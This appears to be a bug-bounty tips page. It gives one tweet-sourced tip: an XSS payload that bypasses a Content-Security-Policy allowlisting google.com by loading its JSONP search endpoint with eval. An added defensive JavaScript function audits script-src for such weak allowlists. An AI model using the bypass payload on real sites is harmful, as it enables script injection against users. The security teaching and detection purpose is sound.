Book of BugBounty Tips

Tips from @YogoshaOfficial

  • [Hacker tips] Are you afraid of CSP when you exploit an XSS? No worries, sometimes the developer leaves something useful 👇
    Exp CSP: Content-Security-Policy: script-src http://google.com
    XSS bypass payload: <script src="https://google.com/complete/search?client=chrome&jsonp=eval(alert(1…));"></script>
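
A defensive check for the weakness this tip relies on, as an added example that is not part of the original tweet: it audits a CSP header's script-src for host allowlists, which stop protecting against XSS once an allowlisted host serves a JSONP-style endpoint. The function names, the issue labels and the one-entry JSONP_HOSTS list (holding only the host named in the tip) are assumptions made for this example.

```javascript
// Added example (not from the original tip). All names are hypothetical.
// Hosts known to serve a JSONP-style endpoint; this list holds only the
// host named in the tip above and would be extended from your own review.
const JSONP_HOSTS = new Set(["google.com"]);

// Parse a CSP header value into a Map of directive name -> source list.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    // The first occurrence of a directive wins; duplicates are ignored.
    if (name && !directives.has(name.toLowerCase())) {
      directives.set(name.toLowerCase(), sources);
    }
  }
  return directives;
}

// Return findings for the directive that governs script loading.
function auditScriptSrc(header) {
  const csp = parseCsp(header);
  const sources = csp.get("script-src") ?? csp.get("default-src");
  if (!sources) return [{ source: null, issue: "no-script-restriction" }];
  const lower = sources.map((s) => s.toLowerCase());
  const hasNonceOrHash = lower.some((s) => /^'(nonce|sha(256|384|512))-/.test(s));
  // With a nonce/hash plus 'strict-dynamic', browsers ignore host allowlists.
  const hostsIgnored = hasNonceOrHash && lower.includes("'strict-dynamic'");
  const findings = [];
  for (const src of lower) {
    if (src === "'unsafe-eval'") findings.push({ source: src, issue: "eval-allowed" });
    if (src === "'unsafe-inline'" && !hasNonceOrHash) {
      findings.push({ source: src, issue: "inline-script-allowed" });
    }
    if (src.startsWith("'") || hostsIgnored) continue; // keyword, nonce or hash
    if (src === "*" || /^[a-z][a-z0-9+.-]*:$/.test(src)) {
      findings.push({ source: src, issue: "any-host-allowed" });
      continue;
    }
    // Strip scheme, port and path to get the host expression.
    const host = src.replace(/^[a-z][a-z0-9+.-]*:\/\//, "").split(/[\/:]/)[0];
    const issue = JSONP_HOSTS.has(host) ? "host-serves-jsonp"
      : host.startsWith("*.") ? "wildcard-host-allowlist" : "host-allowlist-needs-review";
    findings.push({ source: src, issue });
  }
  return findings;
}
```

The policy from the tip is flagged as host-serves-jsonp, while the same host listed next to a nonce and 'strict-dynamic' produces no finding because the browser then ignores the allowlist.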

Last updated 4 months ago